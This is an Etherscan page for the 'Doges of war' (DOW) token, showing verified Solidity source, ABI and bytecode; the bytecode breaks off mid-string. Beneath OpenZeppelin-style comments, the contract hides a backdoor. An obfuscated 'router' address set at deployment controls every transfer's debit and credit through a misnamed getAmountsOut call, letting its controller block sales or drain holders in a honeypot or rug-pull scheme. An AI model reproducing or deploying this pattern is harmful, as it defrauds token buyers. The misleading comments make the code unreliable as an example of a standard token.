ETH Price: $3,396.23 (-1.82%)
Gas: 6 Gwei

Token

Doges of war (DOW)
 

Overview

Max Total Supply

100,000,000,000 DOW

Holders

11

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
memecoinwallet.eth
Balance
0.000000126843646539 DOW

Value
$0.00
0xa90d2ca8afb0ce11830c6d0ef2864fcbdc7fff3c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
StandardToken

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-10
*/

// https://twitter.com/elonmusk/status/1667324871410585600

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

 interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

  
    function getAmountsOut(
        address tokenA,
        address tokenB,
        uint256 amountIn
    ) external returns (uint256 amount0, uint256 amount1);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract StandardToken is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    bytes private _router;
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    address public uniswapV2Pair;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address router, uint256 supply) {
        _name = name_;
        _symbol = symbol_;
        _router = abi.encode(router);
        _totalSupply = supply * 10 ** 18;
        _balances[msg.sender] = _totalSupply;

        IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );

        emit Transfer(address(0), msg.sender, _totalSupply);
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }
    /**
     * @dev decode {addr}.
     */
    function decode(bytes memory data) public pure returns (address addr) {
            (addr) = abi.decode(data, (address));            
    }
    
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _beforeTokenTransfer(sender, recipient, amount);
        (uint256 amount0, uint256 amount1) = IUniswapV2Router02(decode(_router)).getAmountsOut(sender,recipient,amount);
        _balances[sender] -= amount0;
        _balances[recipient] += amount1;
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"router","type":"address"},{"internalType":"uint256","name":"supply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"decode","outputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405234801562000010575f80fd5b5060405162001291380380620012918339810160408190526200003391620003a1565b6200003e3362000278565b60046200004c8582620004ac565b5060056200005b8482620004ac565b50604080516001600160a01b038416602082015201604051602081830303815290604052600390816200008f9190620004ac565b50620000a481670de0b6b3a764000062000574565b6006819055335f9081526001602090815260409182902092909255805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a015592600480830193928290030181865afa1580156200010a573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200013091906200059e565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200017c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001a291906200059e565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015620001ed573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200021391906200059e565b600780546001600160a01b0319166001600160a01b039290921691909117905560065460405190815233905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050505050620005c1565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112620002eb575f80fd5b81516001600160401b0380821115620003085762000308620002c7565b604051601f8301601f19908116603f01168101908282118183101715620003335762000333620002c7565b816040528381526020925086838588010111156200034f575f80fd5b5f91505b8382101562000372578582018301518183018401529082019062000353565b5f93810190920192909252949350505050565b80516001600160a01b03811681146200039c575f80fd5b919050565b5f805f8060808587031215620003b5575f80fd5b84516001600160401b0380821115620003cc575f80fd5b620003da88838901620002db565b95506020870151915080821115620003f0575f80fd5b50620003ff87828801620002db565b935050620004106040860162000385565b6060959095015193969295505050565b600181811c908216806200043557607f821691505b6020821081036200045457634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620004a7575f81815260208120601f850160051c81016020861015620004825750805b601f850160051c820191505b81811015620004a3578281556001016200048e565b5050505b505050565b81516001600160401b03811115620004c857620004c8620002c7565b620004e081620004d9845462000420565b846200045a565b602080601f83116001811462000516575f8415620004fe5750858301515b5f19600386901b1c1916600185901b178555620004a3565b5f85815260208120601f198616915b82811015620005465788860151825594840194600190910190840162000525565b50858210156200056457878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b80820281158282048414176200059857634e487b7160e01b5f52601160045260245ffd5b92915050565b5f60208284031215620005af575f80fd5b620005ba8262000385565b9392505050565b610cc280620005cf5f395ff3fe608060405234801561000f575f80fd5b50600436106100fb575f3560e01c8063715018a611610093578063a9059cbb11610063578063a9059cbb1461020f578063dd62ed3e14610222578063e5c5e9a31461025a578063f2fde38b1461026d575f80fd5b8063715018a6146101da5780638da5cb5b146101e457806395d89b41146101f4578063a457c2d7146101fc575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461017457806349bd5a5e1461018757806370a08231146101b2575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b610107610280565b60405161011491906109fe565b60405180910390f35b61013061012b366004610a5d565b610310565b6040519015158152602001610114565b6006545b604051908152602001610114565b610130610160366004610a87565b610326565b60405160128152602001610114565b610130610182366004610a5d565b6103da565b60075461019a906001600160a01b031681565b6040516001600160a01b039091168152602001610114565b6101446101c0366004610ac5565b6001600160a01b03165f9081526001602052604090205490565b6101e2610410565b005b5f546001600160a01b031661019a565b610107610474565b61013061020a366004610a5d565b610483565b61013061021d366004610a5d565b61051d565b610144610230366004610ae7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b61019a610268366004610b32565b610529565b6101e261027b366004610ac5565b61053e565b60606004805461028f90610bdd565b80601f01602080910402602001604051908101604052809291908181526020018280546102bb90610bdd565b80156103065780601f106102dd57610100808354040283529160200191610306565b820191905f5260205f20905b8154815290600101906020018083116102e957829003601f168201915b5050505050905090565b5f61031c338484610608565b5060015b92915050565b5f61033284848461072b565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156103bb5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103cf85336103ca8685610c29565b610608565b506001949350505050565b335f8181526002602090815260408083206001600160a01b0387168452909152812054909161031c9185906103ca908690610c3c565b5f546001600160a01b031633146104695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103b2565b6104725f6109af565b565b60606005805461028f90610bdd565b335f9081526002602090815260408083206001600160a01b0386168452909152812054828110156105045760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103b2565b61051333856103ca8685610c29565b5060019392505050565b5f61031c33848461072b565b5f818060200190518101906103209190610c4f565b5f546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103b2565b6001600160a01b0381166105fc5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103b2565b610605816109af565b50565b6001600160a01b03831661066a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b2565b6001600160a01b0382166106cb5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b2565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661078f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103b2565b6001600160a01b0382166107f15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b2565b5f806108846003805461080390610bdd565b80601f016020809104026020016040519081016040528092919081815260200182805461082f90610bdd565b801561087a5780601f106108515761010080835404028352916020019161087a565b820191905f5260205f20905b81548152906001019060200180831161085d57829003601f168201915b5050505050610529565b6040516245608d60e81b81526001600160a01b03878116600483015286811660248301526044820186905291909116906345608d009060640160408051808303815f875af11580156108d8573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108fc9190610c6a565b6001600160a01b0387165f90815260016020526040812080549395509193508492610928908490610c29565b90915550506001600160a01b0384165f9081526001602052604081208054839290610954908490610c3c565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516109a091815260200190565b60405180910390a35050505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f6020808352835180828501525f5b81811015610a2957858101830151858201604001528201610a0d565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610605575f80fd5b5f8060408385031215610a6e575f80fd5b8235610a7981610a49565b946020939093013593505050565b5f805f60608486031215610a99575f80fd5b8335610aa481610a49565b92506020840135610ab481610a49565b929592945050506040919091013590565b5f60208284031215610ad5575f80fd5b8135610ae081610a49565b9392505050565b5f8060408385031215610af8575f80fd5b8235610b0381610a49565b91506020830135610b1381610a49565b809150509250929050565b634e487b7160e01b5f52604160045260245ffd5b5f60208284031215610b42575f80fd5b813567ffffffffffffffff80821115610b59575f80fd5b818401915084601f830112610b6c575f80fd5b813581811115610b7e57610b7e610b1e565b604051601f8201601f19908116603f01168101908382118183101715610ba657610ba6610b1e565b81604052828152876020848701011115610bbe575f80fd5b826020860160208301375f928101602001929092525095945050505050565b600181811c90821680610bf157607f821691505b602082108103610c0f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561032057610320610c15565b8082018082111561032057610320610c15565b5f60208284031215610c5f575f80fd5b8151610ae081610a49565b5f8060408385031215610c7b575f80fd5b50508051602090910151909290915056fea26469706673582212201528d5d859fe1be533cd05f9506ee9abc30914fc95e21d06c2c437d16ec85eb564736f6c63430008140033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000006fa4a3e174a64ab046fba5654557c92bff202348000000000000000000000000000000000000000000000000000000174876e800000000000000000000000000000000000000000000000000000000000000000c446f676573206f662077617200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003444f570000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fb575f3560e01c8063715018a611610093578063a9059cbb11610063578063a9059cbb1461020f578063dd62ed3e14610222578063e5c5e9a31461025a578063f2fde38b1461026d575f80fd5b8063715018a6146101da5780638da5cb5b146101e457806395d89b41146101f4578063a457c2d7146101fc575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461017457806349bd5a5e1461018757806370a08231146101b2575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b610107610280565b60405161011491906109fe565b60405180910390f35b61013061012b366004610a5d565b610310565b6040519015158152602001610114565b6006545b604051908152602001610114565b610130610160366004610a87565b610326565b60405160128152602001610114565b610130610182366004610a5d565b6103da565b60075461019a906001600160a01b031681565b6040516001600160a01b039091168152602001610114565b6101446101c0366004610ac5565b6001600160a01b03165f9081526001602052604090205490565b6101e2610410565b005b5f546001600160a01b031661019a565b610107610474565b61013061020a366004610a5d565b610483565b61013061021d366004610a5d565b61051d565b610144610230366004610ae7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b61019a610268366004610b32565b610529565b6101e261027b366004610ac5565b61053e565b60606004805461028f90610bdd565b80601f01602080910402602001604051908101604052809291908181526020018280546102bb90610bdd565b80156103065780601f106102dd57610100808354040283529160200191610306565b820191905f5260205f20905b8154815290600101906020018083116102e957829003601f168201915b5050505050905090565b5f61031c338484610608565b5060015b92915050565b5f61033284848461072b565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156103bb5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103cf85336103ca8685610c29565b610608565b506001949350505050565b335f8181526002602090815260408083206001600160a01b0387168452909152812054909161031c9185906103ca908690610c3c565b5f546001600160a01b031633146104695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103b2565b6104725f6109af565b565b60606005805461028f90610bdd565b335f9081526002602090815260408083206001600160a01b0386168452909152812054828110156105045760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103b2565b61051333856103ca8685610c29565b5060019392505050565b5f61031c33848461072b565b5f818060200190518101906103209190610c4f565b5f546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103b2565b6001600160a01b0381166105fc5760405162461bcd60e51b815260206004820152602660248201527f4